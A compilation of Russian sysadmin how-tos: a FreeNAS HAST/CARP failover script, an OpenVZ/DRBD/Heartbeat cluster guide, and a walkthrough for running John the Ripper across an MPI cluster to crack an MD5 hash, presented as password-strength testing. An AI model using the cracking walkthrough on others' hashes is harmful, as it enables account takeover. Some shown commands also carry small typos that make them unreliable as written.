enable HAST daemon hastd_enable="YES" EOF Если в директории /boot/kerneldaemon отсутствует модуль if_carp.ko, скопируем его из системы на базе FreeBSD 8.2 или 8.3. Создадим файл конфигурации hast.conf, в котором определим /dev/raid3/gr0raid3 в качестве синхронизируемого между узлами хранилища: cat <<EOF > /conf/base/etc/hast.conf resource freenashast { on freenas1 { local /dev/raid3/gr0raid3 remote freenas2 } on freenas2 { local /dev/raid3/gr0raid3 remote freenas1 } } EOF Копируем hast.conf в директорию /etc и перезагружаем систему: cp /conf/base/etc/hast.conf /etc Создаём хранилище hast: hastctl create freenashast После появления устройства /dev/hast/freenashast назначаем текущему узлу роль первичной системы: hastctl role primary freenashast Создаём zpool в хранилище freenashast zpool create -m /mnt gr0 /dev/hast/freenashast Создаём символическую ссылку на директорию RAID3, чтобы web-интерфейс FreeNAS распознал вручную созданное хранилище: ln -s /dev/hast/freenashast /dev/raid3/gr1raid3 После этого в GUI FreeNAS можно автоматически импортировать раздел gr0 и настроить совместный доступ с использованием штатного web-интерфейса. Настроим демон devd для переключения HAST из режима master в slave и наоборот в зависимости от состояния сетевого линка: cat <<EOF >> /conf/base/etc/devd.conf notify 30 { match "system" "IFNET"; match "subsystem" "carp0"; match "type" "LINK_UP"; action "/usr/local/sbin/carp-hast-switch master"; }; notify 30 { match "system" "IFNET"; match "subsystem" "carp0"; match "type" "LINK_DOWN"; action "/usr/local/sbin/carp-hast-switch slave"; }; EOF Создадим скрипт hast-carp-switch, который будет выполнять переключение режимов: cat <<EOF > /usr/local/sbin/carp-hast-switch #!/bin/sh resources="freenashast" zfspool="gr0" delay=3 log="local0.debug" name="carp-hast" case "$1" in master) logger -p $log -t $name "Switching to primary provider for $resources." # in order to wait for the original primary provider to change role state # otherwise, brain-split may happen sleep $delay for disk in $resources; do # ensure that this storage can be switched while $(pgrep -lf "hastd: $disk \$secondary\$" > /dev/null 2>&1 ); do sleep 1 done # Switch role for each disk hastctl role primary $disk if [ $? -ne 0 ]; then logger -p $log -t $name "Unable to change role to primary for resouce ${disk}." exit 1 fi done # Wait for the /dev/hast/* devices to appear for disk in $resources; do for I in $(jot 60); do [ -c "/dev/hast/${disk}" ] && break sleep 0.5 done if [ ! -c "/dev/hast/${disk}" ] ; then logger -p $log -t $name "GEOM provider /dev/hast/$disk did not appear." exit 1 fi done logger -p $log -t $name "Role for HAST resources switched to primary." logger -p $log -t $name "Importing ZFS pool." zpool import -f $zfspool # restart the enabled services for srv in $(sqlite3 /data/freenas-v1.db "select srv_service from services_services where srv_enable=1" \\ | xargs printf "grep 'bool_.*%s' /etc/rc.conf.local\\n" | sh | awk '{print $2}') do case $srv in winbindd_enable|samba_enable) /etc/local/rc.d/samba restart ;; netatalk_enable) /etc/local/rc.d/netatalk restart ;; proftpd_enable) /etc/local/rc.d/proftpd restart ;; inetd_enable) /etc/rc.d/inetd restart ;; nfs_server_enable) /etc/rc.d/nfsserver restart ;; mountd_enable) /etc/rc.d/mountd restart ;; nfsd_enable) /etc/rc.d/nfsd restart ;; rsyncd_enable) /etc/local/rc.d/rsyncd restart ;; esac done ;; slave) logger -p $log -t $name "Switching to secondary provider for $resources." # stop the running services for srv in $(sqlite3 /data/freenas-v1.db "select srv_service from services_services where srv_enable=1" \\ | xargs printf "grep 'bool_.*%s' /etc/rc.conf.local\\n" | sh | awk '{print $2}') do case $srv in winbindd_enable|samba_enable) /etc/local/rc.d/samba stop ;; netatalk_enable) /etc/local/rc.d/netatalk stop ;; proftpd_enable) /etc/local/rc.d/proftpd stop ;; inetd_enable) /etc/rc.d/inetd stop ;; nfs_server_enable) /etc/rc.d/nfsserver stop ;; mountd_enable) /etc/rc.d/mountd stop ;; nfsd_enable) /etc/rc.d/nfsd stop ;; rsyncd_enable) /etc/local/rc.d/rsyncd stop ;; esac done # export the zfs pool & change role to slave for disk in $resources; do zpool export -f $zfspool sleep $delay hastctl role secondary $disk 2>&1 if [ $? -ne 0 ]; then logger -p $log -t $name "Unable to switch role to secondary for resource $disk." exit 1 fi logger -p $log -t name "Role switched to secondary for resource $disk" done ;; *) logger -p $log -t $name "Usage: $0 " exit 1 ;; esac Поменяем права доступа и перезагрузим систему: chmod +x /usr/local/sbin/carp-hast-switch reboot После перезагрузки вручную установим первичный режим HAST для созданного хранилища: hastctl role primary freenashast Выше представленная инструкция рассчитана на создание master-узла. Для запасного slave-узла, который возьмёт на себя управление в случае сбоя первичного узла, настойка выполняется аналогично, за одним исключением - для интерфейса carp0 должен быть установлен меньший приоритет, чем на master-узле: ifconfig carp0 vhid 1 pass freenashast advskew 100 192.168.137.30/24

Запуск John the Ripper в MPI-кластере на базе Ubuntu 10.04 (доп. ссылка 1) [комментарии]

Инструкция по превращению нескольких компьютеров в MPI-кластер и последующем запуске в этом кластере John the Ripper с целью организации эксперимента по распределенному подбору значений, соответствующих заданному хэшу (например, для проверки своих паролей на надежность). Руководство носит упрощенный характер и не охватывает некоторых вопросов по обеспечению высокой надежности и безопасности, рассматривая процесс создания кластера как проводимый в академических целях эксперимент. Для создания кластера нам понадобиться как минимум два компьютера, работающих под управлением Ubuntu Linux 10.04. Для соединения машин будет достаточно любых сетевых карт, John the Ripper не требует большой пропускной способности. Настройка сервера. Для работы кластера нам потребуются следующие пакеты c реализацией MPI Message Passing Interface: $ sudo apt-get install libmpich1.0-dev libmpich-mpd1.0-dev libmpich-shmem1.0-dev mpich2 mpich2-doc Дополнительно, установим John the Ripper, OpenSSH и комплект для сборки из исходных текстов: $ sudo apt-get install john openssh-server build-essentials Для упрощения настройки заносим IP и имя текущего хоста в /etc/hosts 127.0.0.1 localhost 10.0.0.1 server1.test.ru server1 Создаем в системе пользователя "cluster" и создаем каталог bin в домашней директории этого пользователя: $ sudo useradd -m -s /bin/bash cluster $ sudo passwd cluster $ sudo su - cluster -c "mkdir ~/bin;export PATH=~/bin:$PATH" Настраиваем MPICH Создаем в домашней директории пользователя cluster конфигурационный файл ~/.mpd.conf с настройками аутентификации для MPI-кластера. Записываем в файл ~/.mpd.conf строку "secretword=пароль", где пароль для аутентификации всех узлов кластера. Правим права доступа: $ chmod 600 ~/.mpd.conf Список узлов кластера, включая текущий сервер, перечисляем в файле ~/mpd.hosts. Формат строки файла "хост:число процессоров", т.е. для четырехядерного сервера c IP 10.0.0.2 указываем "10.0.0.2:4". Все IP должны быть доступны по сети, т.е. 127.0.0.1 для локального узла указывать нельзя. Итоговый процесс настройки MPICH выглядит следующим образом: $ touch ~/.mpd.conf $ chmod 600 ~/.mpd.conf $ echo secretword=pass>~/.mpd.conf $ /sbin/ifconfig|grep "inet addr" # смотрим IP на хостах inet addr:10.0.0.1 Bcast:10.255.255.255 Mask:255.0.0.0 inet addr:127.0.0.1 Mask:255.0.0.0 $ cat /proc/cpuinfo|grep processor|wc -l # смотрим число ядер CPU 1 $ echo "10.0.0.1:1" >> ~/mpd.hosts Запускаем кластер: $ mpdboot Просматриваем список узлов кластера: $ mpdtrace Завершаем работу кластера: $ mpdallexit Установка John the Ripper Исходные тексты версии John the Ripper с дополнительными MPI-патчами можно загрузить на странице http://www.bindshell.net/tools/johntheripper Загружаем код: $ mkdir source $ cd source $ wget http://www.bindshell.net/tools/johntheripper/john-1.7.2-bp17-mpi8.tar.gz Распаковываем архив и выполняем сборку: $ tar -zxf john-1.7.2-bp17-mpi8.tar.gz $ cd john-1.7.2-bp17-mpi8/src/ $ make # будет выведен список опций $ make linux-x86-sse2 где вместо linux-x86-sse2 можно указать другой тип системы: linux-x86-mmx Linux, x86 с MMX linux-x86-sse Linux, x86 с SSE2 (лучший выбор) linux-x86-any Linux, x86 linux-x86-64 Linux, AMD x86-64, 64-bit/SSE2 (лучший выбор) linux-x86-64-mmx Linux, AMD x86-64, 32-bit с MMX Проверяем работу собранной программы: $ ../run/john -format=DES -test Benchmarking: Traditional DES [128/128 BS SSE2]... DONE Many salts: 1994K c/s real, 1994K c/s virtual Only one salt: 1658 c/s real, 1654K c/s virtual Копируем исполняемый файл в директорию ~/bin $ mv ../run/* ~/bin Проверяем, что John the Ripper собран с поддержкой MPI: $ john|grep mpi John the Ripper password cracker, version 1.7.2_bp17_mpi Повторяем все ранее описанные шаги на всех узлах кластера. Настраиваем беспарольный вход по SSH для пользователя cluster для всех узлов кластера. Генерируем rsa-ключ: $ ssh-keygen -t rsa Копируем ключ на другие узлы кластера: $ ssh cluster@10.0.0.2 mkdir -p .ssh $ cat .ssh/id_rsa.pub | ssh cluster@10.0.0.2 'cat>>.ssh/authorized_keys' Добавляем параметры узла в ~/mpd.hosts и создаем ~/.mpd.conf и ~/mpd.hosts на удаленных узлах: $ ssh cluster@10.0.0.2 'cat /proc/cpuinfo|grep processor|wc -l' 2 $ echo 10.0.0.2:2 >> ~/mpd.hosts $ for i in `cut --delimiter=: -f1 ~/mpd.hosts`;do scp ~/.mpd.conf cluster@$i:~; scp ~/mpd.hosts cluster@$i:~; done Добавляем в /etc/hosts имя дополнительного узла: 10.0.0.2 node1 Синхронизируем содержимое /etc/hosts на всех узлах. Если этого не сделать возникнет ошибка: mpdboot_server (handle_mpd_output 407): failed to handshake with mpd on 10.0.0.2; recvd Запускаем кластер: $ mpdboot --verbose --ncpus=1 -n 2 running mpdallexit on server LAUNCHED mpd on server via RUNNING: mpd on server LAUCNHED mpd on 10.0.0.2 via server RUNNING: mpd on 10.0.0.2 где, --verbose - вывод расширенной информации, а "--ncpus=1" - задаем число CPU для текущего сервера, "-n 2" - указываем, что в кластере 2 узла (текущий сервер 10.0.0.1 + внешний узел 10.0.0.2). На втором узле 10.0.0.2 MPICH будет запущен автоматически. Смотрим список активных узлов: $ mpdtrace server node1 Для тестирования, запустим команду hostname на всех узлах: $ mpiexec -np 3 hostname server node1 node1 node1 - вывелось два раза так как к узлу привязано 2 CPU и задача была выполнена два раза. Завершаем работу кластера: $ mpdallexit Using the MPI cluster to crack passwords. Попробуем подобрать значение для MD5-хэша: $ echo fb7852f240efac3c0bdce8cf9dcb2e50 > crackme1.md5 Запускаем кластер: $ mpdboot --ncpus=2 -n 2 Копируем файл crackme1.md5 на все узлы: $ for i in `cut --delimiter=: -f1 ~/mpd.hosts`;do scp ~/crackme1.mp5 cluster@$1:~;done Чтобы упросить процесс копирования на все узлы кластера напишем простой скрипт distributer.sh: #!/bin/bash # usage: ./distributer.sh filename for x in `cut --delimiter=: -f1 ~/mpd.hosts`;do scp $1 cluster@$i:~;done Запускаем John the Ripper на 3 CPU: $ mpiexec -np 3 john --format:raw-MD5 crackme1.md5 Loaded 1 password hash (Raw MD5 [raw-md5 SSE2]) Loaded 1 password hash (Raw MD5 [raw-md5 SSE2]) Loaded 1 password hash (Raw MD5 [raw-md5 SSE2]) test1 (user) Process 2 completed loop. Threat: 2 guesses: 1 time 0:00:00:02 (3) c/s: 5616K trying: 12345 - 56778 После завершения подбора завершаем работу кластера: $ mpdallexit

Отказоустойчивый кластер на базе OpenVZ, DRBD и Heartbeat 2 Автор: Максим Зиналь [комментарии]

Постановка задачи и общее описание решения Совместное применение технологий Linux Heartbeat, DRBD и OpenVZ позволяет создавать удобные в эксплуатации решения, обеспечивающие повышенную надёжность функционирования важных для пользователей сервисов. Несмотря на доступность большого количества материалов по технологиям построения отказоустойчивых решений на базе ОС Linux, автору данной статьи не удалось отыскать полного и исчерпывающего описания процесса создания системы, основанной на сочетании использования перечисленных выше технологий. Данная статья описывает результаты практической апробации отказоустойчивого решения, осуществляющего автоматическую миграцию виртуальных окружений OpenVZ на резервный узел кластера при нарушении функционирования основного узла. Рассматриваем пример развёртывания приложения, использующего базу данных (PostgreSQL) и развёртываемого на базе сервера приложений (Tomcat). В качестве базовой операционной системы используем Debian GNU/Linux 5.0 (Lenny). Предполагаем, что приложение не поддерживает кластерный режим работы (не может функционировать одновременно на нескольких узлах). Для обеспечения отказоустойчивого функционирования используем два идентичных сервера, на одном из которых в нормальном режиме функционируют необходимые базы данных, на другом - сервер приложений. Взаимодействие между базами данных и приложениями осуществляется через сеть TCP/IP. Для установки сервера СУБД и сервера приложений создаем отдельные виртуальные OpenVZ-окружения. Конфигурация виртуальных окружений и физических серверов подбирается таким образом, чтобы на одном физическом сервере при необходимости могли одновременно функционировать как сервер СУБД, так и сервер приложений (возможно, со сниженной производительностью). Для обеспечения функционирования OpenVZ при использовании 32-битной версии Debian GNU/Linux физические сервера должны поддерживать технологию PAE (Physical Address Extension). Если вместо физических серверов используются виртуальные машины VirtualBox, требуется включить соответствующий режим в настройках виртуальной машины. Для синхронизации данных, хранящихся на физических серверах, используем DRBD в режиме master-slave. На физических серверах создаем два DRBD-раздела (один для сервера приложений, другой для сервера СУБД), причём в нормальном режиме функционирования на каждом из серверов в режиме master находится только один из DRBD-разделов. Для контроля доступности серверов кластера и переключения на резервный узел при отказе основного узла используем Heartbeat. Создаваемый в результате кластер обеспечивает автоматическую миграцию ресурсов с вышедшего из строя узла кластера на оставшийся работоспособным узел. Поскольку ни используемая СУБД, ни приложения не поддерживают кластерный режим работы, неизбежно возникает приостановка предоставления сервисов на период миграции ресурсов с остановленного узла кластера на работающий. Продолжительность периода приостановки сервисов зависит от времени запуска мигрируемых сервисов после сбоя, из практических соображений в нашем примере получается, что этот период будет менее 1 минуты. Необходимые первоначальные знания и навыки 1.Работа с инсталлятором системы Debian/GNU Linux 5.0, в частности, с модулем разметки дисков. Умение установить и настроить базовую систему. 2.Установка и удаление пакетов Debian с использованием программы aptitude. Настройка исходных репозиториев для установки и обновления программ (/etc/apt/sources). 3.Понимание принципов работы LVM, навыки настройки и применения LVM (http://tldp.org/HOWTO/LVM-HOWTO/). 4.Понимание принципов работы OpenVZ (http://www.openvz.org/). Навыки настройки окружений OpenVZ и работы с ними. 5.Общее понимание принципов организации отказоустойчивых кластеров (контроль доступности, синхронизация данных, миграция ресурсов, потеря синхронизации - "brain split"). 6.Понимание принципов работы DRBD 8 (http://www.drbd.org/). 7.Понимание принципов работы Heartbeat 2 (http://linux-ha.org/wiki/Heartbeat). Установка базовой системы Для установки базовой системы может использоваться дистрибутивный комплект Debian GNU/Linux 5.0. При установке для удобства дальнейшей работы выполним русификацию системы, а вот от установки группы пакетов "Стандартная система" откажемся - большая часть пакетов из этой группы нам не понадобится. Установку системы на обоих узлах выполняем идентичным образом, различаются только имя узла и сетевые настройки. В данном примере использовались параметры, приведённые в таблице. Параметр Узел 1 Узел 2 Имя узла deimos phobos IP-адрес 192.168.5.101 192.168.5.102 Для разметки дисков используем комбинацию обычных разделов и LVM. Для корневой файловой системы (совмещённой с файловой системой /boot) создаем обычный раздел №1 размером 4 Гбайт (этого более, чем достаточно для размещения необходимых компонентов), всё остальное пространство выделяем в раздел 2 и создаем на нем физический том LVM. Здесь предполагается, что к серверам подключено по одному диску (тому дискового массива), в случае наличия нескольких устройств следует особым образом спланировать порядок их использования. На основе созданного физического тома LVM создаем группу логических томов, в которой создаем том подкачки (размер зависит от размера оперативной памяти) и том для файловой системы /var (объёмом 2 Гбайт). Для корневой файловой системы и файловой системы /var используем файловую систему ext3, так как на нее меньше всего нареканий по части восстановления в аварийных ситуациях. После завершения установки необходимо убедиться в наличии связи между узлами кластера с помощью команды ping. Для обеспечения доступа к узлам кластера по именам рекомендуется прописать соответствие адресов именам в файле /etc/hosts. Установка дополнительных пакетов Вместо установленной по умолчанию версии ядра необходимо установить ядро с поддержкой OpenVZ: aptitude install linux-image-2.6-openvz-686 aptitude remove linux-image-2.6-686 Также необходимо установить модули DRBD8 и соответствующие управляющие программы: aptitude install drbd8-modules-2.6-openvz-686 drbd8-utils Установка Heartbeat 2: aptitude install heartbeat-2 Для удобства работы устанавливаем mc, less, atop и ssh: aptitude install mc atop ssh Настройка DRBD На каждом узле будущего кластера необходимо создать по два тома: один для базы данных, другой - для сервера приложений. Размер томов следует выбирать исходя из планируемых потребностей базы данных и сервера приложений. В дальнейшем при необходимости можно будет расширить соответствующие тома. Поскольку заранее точно предсказать требуемое пространство (и его соотношение между потребителями) достаточно сложно, предпочтительно оставить в группе томов LVM достаточный объём свободного пространства, а виртуальным окружениям выделить тот объём, который будет необходим в ближайшее время. Пример команд создания томов LVM: lvcreate -L 8G -n db VGroup00 lvcreate -L 4G -n apps VGroup00 Далее необходимо создать конфигурационный файл /etc/drbd.conf, определяющий состав дисковых ресурсов DRBD. Пример конфигурационного файла drbd.conf: global { usage-count no; } common { handlers { pri-on-incon-degr "echo o > /proc/sysrq-trigger ; halt -f"; pri-lost-after-sb "echo o > /proc/sysrq-trigger ; halt -f"; local-io-error "echo o > /proc/sysrq-trigger ; halt -f"; outdate-peer "/usr/lib/heartbeat/drbd-peer-outdater -t 5"; # pri-lost "echo pri-lost. Have a look at the log files. | mail -s 'DRBD Alert' root"; # split-brain "echo split-brain. drbdadm -- --discard-my-data connect $DRBD_RESOURCE ? | mail -s 'DRBD Alert' root"; } startup { # wfc-timeout 0; degr-wfc-timeout 120; # 2 minutes. # wait-after-sb; } disk { on-io-error detach; no-disk-flushes; no-md-flushes; } syncer { rate 30M; al-extents 257; } net { sndbuf-size 512k; timeout 60; # 6 seconds (unit = 0.1 seconds) connect-int 10; # 10 seconds (unit = 1 second) ping-int 10; # 10 seconds (unit = 1 second) ping-timeout 5; # 500 ms (unit = 0.1 seconds) max-buffers 2048; cram-hmac-alg "sha1"; shared-secret "DJujhjltepbyfFDRbtddtLzlmrf"; after-sb-0pri discard-younger-primary; after-sb-1pri consensus; after-sb-2pri disconnect; rr-conflict disconnect; } } resource db { protocol C; on deimos { device /dev/drbd0; disk /dev/VGroup00/db; address 192.168.5.101:7788; flexible-meta-disk internal; } on phobos { device /dev/drbd0; disk /dev/VGroup00/db; address 192.168.5.102:7788; flexible-meta-disk internal; } } resource apps { protocol C; on deimos { device /dev/drbd1; disk /dev/VGroup00/apps; address 192.168.5.101:7789; flexible-meta-disk internal; } on phobos { device /dev/drbd1; disk /dev/VGroup00/apps; address 192.168.5.102:7789; flexible-meta-disk internal; } } В приведённом примере: Параметры в секции common наследуются всеми ресурсными секциями. При необходимости для конкретных ресурсов эти параметры можно переопределить. Настройками определено два DRBD-устройства: /dev/drbd0 и /dev/drbd1, для каждого из которых используются два хранилища: на узле phobos и на узле deimos. Параметр syncer.rate требуется установить исходя из пропускной способности сетевого интерфейса между узлами. Параметр задается в единицах байт/сек, суффикс M означает умножение на 1 млн. Параметр common.net.shared-secret требуется установить в значение пароля, используемого для аутентификации взаимодействия между узлами. Сетевые адреса узлов и номера портов необходимо установить в соответствии с сетевой конфигурацией, соответствующие параметры: resource(db).on(deimos).address resource(db).on(phobos).address resource(apps).on(deimos).address resource(apps).on(phobos).address Подготовленный конфигурационный файл /etc/drbd.conf должен быть одинаков на обоих узлах. Передать файл с узла phobos на узел deimos можно командой: scp /etc/drbd.conf deimos:/etc/drbd.conf Необходимо убедиться, что DRBD запущен. Для этого используется команда /etc/init.d/drbd status. Если DRBD остановлен, требуется выполнить команду /etc/init.d/drbd start. После создания и синхронизации конфигурационного файла необходимо выполнить инициализацию томов DRBD выполнением (на каждом узле) следующих команд: drbdadm create-md db drbdadm create-md apps После завершения томов необходимо форсировать синхронизацию томов между узлами. Для этого следует выбрать (произвольным образом) один из узлов в качестве основного, и выполнить на нем команды: drbdsetup /dev/drbd0 primary -o drbdsetup /dev/drbd1 primary -o Ход синхронизации можно контролировать по содержимому файла /proc/drbd. После завершения синхронизации рекомендуется перезагрузить оба узла и проконтролировать, что запуск DRBD был выполнен автоматически и что состояние томов является синхронным, путём выполнения (после перезагрузки) команды /etc/init.d/drbd status. Создание виртуальных окружений Перед созданием виртуальных окружений необходимо принять решение, на каком из физических серверов какое из двух виртуальных окружений должно функционировать в нормальном режиме. Предположим, что сервер баз данных (db) будет функционировать на физическом сервере deimos, а сервер приложений (apps) - на физическом сервере phobos. Действия по настройке каждого из виртуальных окружений будем выполнять на том физическом сервере, на котором данное окружение будет в дальнейшем преимущественно функционировать. Затем скопируем необходимые настройки на второй сервер. Первым шагом в создании виртуальных окружений является создание файловых систем, в которых будут размещаться данные этих виртуальных окружений: 1.Создаются каталоги для монтирования файловых систем виртуальных окружений 2.Соответствующей DRBD-устройство переводится в режим "primary" 3.Создается файловая система ext3 на DRBD-устройстве 4.Отключаются автоматические проверки целостности файловой системы при монтировании 5.Выполняется монтирование созданной файловой системы На сервере deimos выполняем команды: mkdir /Data mkdir /Data/db mkdir /Data/apps drbdadm primary db mkfs -t ext3 /dev/drbd0 tune2fs -c 0 -i 0 /dev/drbd0 mount /dev/drbd0 /Data/db На сервере phobos выполняем команды: mkdir /Data mkdir /Data/db mkdir /Data/apps drbdadm primary apps mkfs -t ext3 /dev/drbd1 tune2fs -c 0 -i 0 /dev/drbd1 mount /dev/drbd1 /Data/apps Создание виртуальных окружений необходимо выполнять на основе шаблона. Такой шаблон можно подготовить самостоятельно в соответствии с инструкцией (http://wiki.openvz.org/Debian_template_creation), либо использовать готовый. Для создания виртуальных окружений используются команды: На сервере deimos vzctl create 101 --ostemplate debian-5.0-i386-my --ipadd \ 192.168.5.103 --hostname db --private /Data/db/vm На сервере phobos vzctl create 102 --ostemplate debian-5.0-i386-my --ipadd \ 192.168.5.104 --hostname apps --private /Data/apps/vm Необходимо учесть следующие особенности: 1.Виртуальным окружениям необходимо присвоить разные идентификаторы (в нашем примере - 101 и 102), иначе их нельзя будет запустить на одном сервере. 2.IP-адреса и имена хостов виртуальных окружений должны соответствовать используемой сетевой конфигурации. 3.В параметре ostemplate нужно указать имя используемого шаблона виртуальных окружений. 4.Подкаталог 'vm' томов виртуальных окружений не должен существовать на момент выполнения команды vzctl create, иначе команда завершится с ошибкой. После создания виртуальных окружений необходимо установить для них ресурсные ограничения и проверить формальную корректность выполненных настроек. Величина ресурсных ограничений зависит от доступных аппаратных ресурсов серверов и от потребностей запускаемых приложений. В нашем примере используются следующие команды настройки: На сервере deimos vzctl set 101 --numproc 300:300 --kmemsize 32m:40m \ --vmguarpages 512m:unlimited --privvmpages 512m:512m \ --oomguarpages 256m:unlimited --shmpages 256m:256m \ --tcpsndbuf 1m:2m --tcprcvbuf 1m:2m --save На сервере phobos vzctl set 102 --numproc 300:300 --kmemsize 32m:40m \ --vmguarpages 512m:unlimited --privvmpages 512m:512m \ --oomguarpages 256m:unlimited --shmpages 256m:256m \ --tcpsndbuf 1m:2m --tcprcvbuf 1m:2m --save В приведённом примере разрешено запускать до 300 потоков выполнения (параметры numproc и kmemsize), использующих до 512 Мбайт виртуальной памяти (параметры vmguardpages, privvmpages), с гарантией отсутствия вытеснения при нехватке памяти до 256 Мбайт (параметр oomguarpages), и с допустимым использованием разделяемой памяти System V до 256 Мбайт (параметр shmpages). Также установлен увеличенный размер буферов протокола TCP. Для проверки корректности полученной конфигурации используется программа vzcfgvalidate: На сервере deimos vzcfgvalidate /etc/vz/conf/101.conf На сервере phobos vzcfgvalidate /etc/vz/conf/102.conf Необходимо отключить автоматический запуск виртуальных окружений при старте сервера, так как запуск и остановка должны выполняться под управлением системы Heartbeat. На сервере deimos vzctl set 101 --onboot no --save На сервере phobos vzctl set 102 --onboot no --save Для запуска и остановки виртуальных окружений вручную используются команды: На сервере deimos vzctl start 101 # Запуск vzctl stop 101 # Остановка На сервере phobos vzctl start 102 # Запуск vzctl stop 102 # Остановка ВНИМАНИЕ! Запуск и остановка виртуальных окружений вручную, как и другие операции ручного манипулирования состоянием управляемых Heartbeat ресурсов (включая тома DRBD и созданные на них файловые системы) допускается только тогда, когда службы Heartbeat остановлены на обоих узлах кластера. Или - в нашем текущем примере - ещё не настроены вовсе. После первоначального запуска созданных виртуальных окружений можно выполнить установку в эти виртуальные окружения прикладного программного обеспечения, а можно и отложить действия по установке до завершения настройки кластера. В нашем примере можно установить сервер СУБД в виртуальное окружение db и сервер приложений в виртуальное окружение apps: На сервере deimos выполняем команды: vzctl enter 101 aptitude install postgresql exit На сервере phobos выполняем команды: vzctl enter 102 cd /root mkdir DISTRIB cd DISTRIB scp files.sample.com:/distrib/jdk-6u22-linux-i586.bin . scp files.sample.com:/distrib/apache-tomcat-6.0.29.tar.gz . cd /opt sh /root/DISTRIB/jdk-6u22-linux-i586.bin tar xfz /root/DISTRIB/apache-tomcat-6.0.29.tar.gz exit Описание полного состава действий по настройке СУБД, сервера приложений и самих приложений выходит за рамки данной статьи. Конфигурационные файлы виртуальных окружений необходимо сохранить на обоих узлах кластера. Для этого на узле phobos выполним следующие команды: scp deimos:/etc/vz/conf/101.conf /etc/vz/conf/ scp /etc/vz/conf/102.conf deimos:/etc/vz/conf/ Настройка Heartbeat В рамках подготовки к настройке Heartbeat необходимо активировать модуль ядра softdog, обеспечивающий автоматическую перезагрузку физического сервера при длительном отсутствии активности со стороны системы Heartbeat. Для этого на обоих узлах кластера (phobos и deimos) выполняются следующие команды: modprobe softdog nowayout=0 echo "softdog nowayout=0" >>/etc/modules.conf Настройка Heartbeat заключается в создании трёх конфигурационных файлов: /etc/ha.d/ha.cf - файл основной конфигурации Heartbeat /etc/ha.d/authkeys - файл аутентификации узлов /etc/ha.d/haresources - файл описания ресурсов кластера Файлы authkeys и haresources должны быть одинаковы на обоих узлах кластера. Файлы ha.cf также должны совпадать с точностью до параметров метода контроля состояния соседнего узла кластера (в нашем примере используется метод ucast, для которого обязательно указать IP другого узла кластера - при использовании других методов файлы ha.cf на обоих узлах кластера обычно совпадают). Пример содержимого файла authkeys: auth 1 1 sha1 4ffb8d2d786ba67772045b2eeac899ed Команда для генерации ключа, помещаемого в файл файла authkeys: (dd if=/dev/urandom bs=1024 count=1 2>/dev/null) | md5sum Пример файла haresources, настроенного для нашего случая: deimos drbddisk::db Filesystem::/dev/drbd0::/Data/db openvz::101 phobos drbddisk::apps Filesystem::/dev/drbd1::/Data/apps openvz::102 Здесь предполагается наличие в каталоге /etc/ha.d/resource.d следующих скриптов: drdbdisk - управление DRBD Filesystem - обеспечение монтирования файловой системы openvz - управление виртуальными окружениями OpenVZ Скрипты drdbdisk и Filesystem поставляются в составе пакета heartbeat-2 ОС Debian GNU/Linux 5.0. Скрипт openvz приводим здесь: #!/bin/bash # # This script is inteded to be used as resource script by heartbeat # ### VZCTL="/usr/sbin/vzctl" if [ "$#" -eq 2 ]; then RES="$1" CMD="$2" else RES="101" CMD="$1" fi case "$CMD" in start) $VZCTL start $RES ;; stop) $VZCTL stop $RES ex=$? case $ex in 0) exit 0 ;; *) exit 1 ;; esac ;; status) ST=$( $VZCTL status $RES 2>&1 ) STATE=$( echo "$ST" | (read s1 s2 s3 s4 st && echo $st) ) case $STATE in running) echo "running" exit 0 # LSB status "service is OK" ;; down) echo "stopped" ;; *) echo "stopped ($ST)" ;; esac exit 3 # LSB status "service is not running" ;; *) echo "Usage: openvz resource {start|stop|status}" exit 1 ;; esac exit 0 Примеры файлов ha.cf на серверах phobos и deimos: На сервере deimos: keepalive 1 deadtime 15 warntime 5 initdead 120 ucast eth0 192.168.5.102 auto_failback on watchdog /dev/watchdog node deimos node phobos На сервере phobos: keepalive 1 deadtime 15 warntime 5 initdead 120 ucast eth0 192.168.5.101 auto_failback on watchdog /dev/watchdog node deimos node phobos Дополнительные настройки Heartbeat Крайне желательно в промышленной конфигурации настроить отдельный канал контроля состояния серверов (например, на основе соединения через COM-порты). Для реализации такой схемы потребуется изменение настроек в файле ha.cf. Также крайне желательно обеспечить функционирование STONITH-устройства. Как минимум должно быть настроено аварийное завершение работы узлов кластера путём входа через SSH (STONITH-модуль external/ssh), идеальным же вариантом является подача команды в систему управления электропитанием либо в отдельный блок управления состоянием сервера (iLo, ...). Тестирование кластера Для тестирования необходимо сымитировать стандартные ситуации: 1.Выключение узла deimos 2.Включение узла deimos через некоторое время 3.Выключение узла phobos 4.Включение узла phobos через некоторое время 5.Одновременная загрузка узлов кластера 6.Загрузка узлов кластера с задержкой относительно друг друга В случае реализации описанных выше дополнительных настроек Heartbeat также полезно выполнить дополнительные тесты: 1. Нарушение сетевого взаимодействия между узлами кластера (возможно - при сохранении доступа к ним из внешних сетей) Обслуживание: расширение DRBD-дисков Для расширения доступного виртуальным окружениям дискового пространства в группе томов LVM, в которой были созданы тома DRBD, должно быть достаточное свободное пространство. Подключение дополнительных дисков В случае отсутствия достаточного свободного пространства можно расширить группу томов путём включения в неё дополнительных физических томов. Для этого необходимо, чтобы к используемым серверам были подключены необходимые дисковые устройства. В большом числе случаев для подключения дополнительных дисков будет необходимо выполнить остановку соответствующего сервера, в нашем случае эту операцию можно выполнить без длительного перерыва в предоставлении сервисов пользователям, за счёт использования возможностей кластера. Пример сценария добавления дисков: 1.Остановить (выключить) сервер deimos. Все сервисы мигрируют на сервер phobos. 2.Добавить дополнительные диски в сервер deimos, выполнить необходимые настройки BIOS и контроллеров для обеспечения доступа к дискам. 3.Включить сервер deimos. Дождаться синхронизации томов DRBD (контроль по содержимому файла /proc/drbd) и завершения обратной миграции части сервисов обратно на сервер deimos. 4.Остановить (выключить) сервер phobos. Все сервисы мигрируют на сервер deimos. 5.Добавить дополнительные диски в сервер phobos. 6.Включить сервер phobos. При выполнении работ по подключению дисков по описанному выше сценарию в нашем случае будет два перерыва в предоставлении сервисов пользователям, каждый из перерывов в пределах 1 минуты. Подключенные дополнительные диски необходимо разметить и разместить на них физические тома LVM. Для разметки дисков используем программу GNU Parted, если она не установлена - устанавливаем её командой aptitude install parted. Пример команд для выполнения разметки диска: deimos:~# parted /dev/sdc GNU Parted 1.8.8 Using /dev/sdc Welcome to GNU Parted! Type 'help' to view a list of commands. (parted) print Error: /dev/sdc: unrecognised disk label (parted) mklabel New disk label type? msdos (parted) mkpart primary 1s -1s (parted) set 1 lvm on (parted) print Model: ATA VBOX HARDDISK (scsi) Disk /dev/sdc: 2147MB Sector size (logical/physical): 512B/512B Partition Table: msdos Number Start End Size Type File system Flags 1 